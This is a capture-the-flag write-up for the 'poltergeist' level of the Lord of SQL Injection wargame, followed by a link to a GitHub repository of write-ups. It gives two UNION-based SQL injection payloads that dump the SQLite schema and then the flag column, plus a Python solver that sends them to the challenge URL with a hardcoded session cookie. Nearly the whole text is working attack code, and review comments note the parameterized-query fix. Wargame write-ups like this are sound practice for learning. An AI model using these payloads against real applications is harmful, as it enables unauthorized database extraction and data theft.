-
Prob
Payload
pw=' union select sql from sqlite_master limit 1,1--%20
pw=' union select flag_0876285c from flag_70c81d99--%20
Exploit
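"""Solver for the "poltergeist" level of the Lord of SQL Injection wargame.

The script sends the two UNION-based payloads shown above to the challenge
page and reads the reflected result out of the ``<h2>`` element of the
response:

1. ``tbl_name_and_col_name`` reads a row of ``sqlite_master.sql`` (the stored
   ``CREATE TABLE`` text), which discloses the flag table and column names.
2. ``get_flag`` selects that column from that table.

NOTE(review): the challenge source is not shown on this page; presumably the
``pw`` parameter is concatenated into the SQL text. The matching fix on the
server side is a parameterized query, plus not reflecting raw query results
into the page.
"""
import os

import requests
from bs4 import BeautifulSoup

url = "https://los.rubiya.kr/chall/poltergeist_a62c7abc7e6ce0080dbf0e14a07d1f1d.php?"

# A session identifier is a credential: anyone holding a still-valid value can
# act as that account. Prefer supplying it through the environment
# (LOS_PHPSESSID is a name chosen for this script) rather than committing it.
# The literal is kept only as a fallback so the script behaves as published.
cookie = {'PHPSESSID': os.environ.get('LOS_PHPSESSID', 'o8k4eis6nm0q904ajkf4t2aiva')}

# Without a timeout, requests.get() can block indefinitely on a stalled server.
REQUEST_TIMEOUT = 10


def _fetch_h2(query):
    """Request the challenge page with *query* appended and return str() of its <h2> list.

    Raises:
        requests.HTTPError: the server answered with an error status.
        RuntimeError: the response contains no ``<h2>`` element, so the
            fixed-offset slicing done by the callers would yield garbage.
    """
    res = requests.get(url=url + query, cookies=cookie, timeout=REQUEST_TIMEOUT)
    res.raise_for_status()
    soup = BeautifulSoup(res.text, 'html.parser')
    headings = soup.find_all('h2')
    if not headings:
        raise RuntimeError("no <h2> element in response; session expired or page layout changed?")
    # The callers index into the repr of the result list, brackets included.
    return str(headings)


def tbl_name_and_col_name():
    """Return ``(table_name, column_name)`` parsed from the reflected schema row.

    The offsets below are fixed character positions into the stringified
    ``<h2>`` list. They presumably match the exact markup and identifier
    lengths of this challenge instance. Verify them against a live response
    before reuse.
    """
    query = "pw=' union select sql from sqlite_master limit 1,1-- "
    h2 = _fetch_h2(query)
    table_name = h2[25:len(h2)-33]
    column_name = h2[44:len(h2)-14]
    print("TABLE NAME : " + table_name)
    print("COLUMN NAME : " + column_name)
    return table_name, column_name


def get_flag(table_name, column_name):
    """Query *column_name* from *table_name* through the same parameter and print the result.

    Both names are interpolated into the request unmodified; they are expected
    to be the values returned by ``tbl_name_and_col_name``. Returns ``None``.
    """
    query = "pw=' union select {} from {}-- ".format(column_name,table_name)
    h2 = _fetch_h2(query)
    # Fixed offsets again: strips the list/tag wrapper around the reflected value.
    flag = h2[11:len(h2)-6]
    print("FLAG : " + flag)


if __name__ == "__main__":
    table_name, column_name = tbl_name_and_col_name()
    get_flag(table_name, column_name)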
GitHub - hackintoanetwork/LOS: Lord of SQL Injection WriteUps
Lord of SQL Injection WriteUps. Contribute to hackintoanetwork/LOS development by creating an account on GitHub.
github.com